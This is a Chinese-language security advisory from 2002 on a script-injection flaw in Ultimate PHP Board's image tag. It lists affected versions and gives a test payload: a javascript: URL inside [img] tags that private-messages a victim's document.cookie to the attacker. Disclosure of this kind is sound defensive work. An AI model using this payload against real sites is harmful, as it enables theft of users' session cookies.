|
|
Ultimate PHP Board Image脚本可插入漏洞
发布时间:2002-04-28
更新时间:2002-04-28
严重程度:中
威胁程度:用户敏感信息泄露
错误类型:输入验证错误
利用方式:服务器模式
BUGTRAQ ID:4603
受影响系统X-Crew Ultimate PHP Board 1.0 Beta
- Apache Software Foundation Apache 1.3.19
- Apache Software Foundation Apache 1.3.19 win32
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.20 win32
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.22 win32
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.23 win32
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.24 win32
X-Crew Ultimate PHP Board 1.1
- Apache Software Foundation Apache 1.3.19
- Apache Software Foundation Apache 1.3.19 win32
- Apache Software Foundation Apache 1.3.20
- Apache Software Foundation Apache 1.3.20 win32
- Apache Software Foundation Apache 1.3.22
- Apache Software Foundation Apache 1.3.22 win32
- Apache Software Foundation Apache 1.3.23
- Apache Software Foundation Apache 1.3.23 win32
- Apache Software Foundation Apache 1.3.24
- Apache Software Foundation Apache 1.3.24 win32 详细描述
Ultimate PHP Board (UPB)是使用于多种操作系统的WEB论坛程序。
UPB中的图象标识符没有很好过滤数据内容,攻击者可以插入恶意脚本导致用户浏览时代码在用户浏览器上执行。造成信息泄露。
测试代码
[ img]javascript:window.open(' index.php?upb=pm&mode=send&send=yes&target_id=SONPROPREID&betreff=cookie&pm=' +document.cookie+ ' &smilies=1&use_upbcode=1&pmbox_id=IDDELAVICTIME&check=yes ')[/img ]
解决方案
尚无
相关信息
frog frog <leseulfrog@hotmail.com>.
参考:http://online.securityfocus.com/archive/82/269023/2002-04-22/2002-04-28/0
相关主页:http://www.tritanium-scripts.de/
|
